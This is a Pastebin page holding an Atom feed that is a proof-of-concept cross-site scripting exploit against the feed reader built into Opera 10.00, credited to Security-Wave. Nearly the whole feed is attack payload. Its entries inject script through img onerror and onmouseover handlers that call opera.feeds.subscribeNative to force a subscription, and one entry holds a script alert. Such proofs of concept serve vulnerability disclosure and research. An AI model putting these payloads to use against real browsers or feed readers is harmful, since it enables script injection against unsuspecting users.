Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?xml version="1.0" encoding="utf-8"?>
- <feed
- xmlns="http://www.w3.org/2005/Atom"
- xml:base="http://labs:8888/RSS/rss.atom">
- <id>http://labs:8888/RSS/rss.atom</id>
- <title>XSS au sein des flux RSS sur Opera 10.00</title>
- <updated>2009-09-09T00:00:00Z</updated>
- <link href="" />
- <link rel="self" href="" />
- <author><name>Nicolas Kerschenbaum</name></author>
- <contributor>
- <name>Security-Wave</name>
- <div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
- This exploit will inject this feed in Opera's inbuilt feed aggregator
- </div>
- </contributor>
- <entry>
- <title>Flux RSS malicieux 1</title>
- <id>http://labs:8888/RSS/rss.atom#1</id>
- <link href="http://labs:8888/RSS/rss.atom#1"/>
- <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><img src="http://google.com" onerror="opera.feeds.subscribeNative(location.href)"></img>
- </div></content>
- <updated>2009-09-09T00:00:00Z</updated>
- </entry>
- <entry>
- <title>Flux RSS malicieux 2</title>
- <id>http://labs:8888/RSS/rss.atom#2</id>
- <link href="http://labs:8888/RSS/rss.atom#2"/>
- <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><p onmouseover="opera.feeds.subscribeNative(location.href)">Mouse over me</p>
- </div></content>
- <updated>2009-09-09T00:00:00Z</updated>
- </entry>
- <entry>
- <title>Flux RSS malicieux 3</title>
- <id>http://labs:8888/RSS/rss.atom#3</id>
- <link href="http://labs:8888/RSS/rss.atom#3"/>
- <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><a href="http://google.com" onmouseover="opera.feeds.subscribeNative(location.href)">Mouse over me</a>
- </div></content>
- <updated>2009-09-09T00:00:00Z</updated>
- </entry>
- <entry>
- <title>Fenetre d'alerte JavaScript</title>
- <id>http://labs:8888/RSS/rss.atom#4</id>
- <link href="http://labs:8888/RSS/rss.atom#4"/>
- <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>window.alert('XSS by Security-Wave');</script></div></content>
- <updated>2009-09-09T00:00:00Z</updated>
- </entry>
- </feed>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement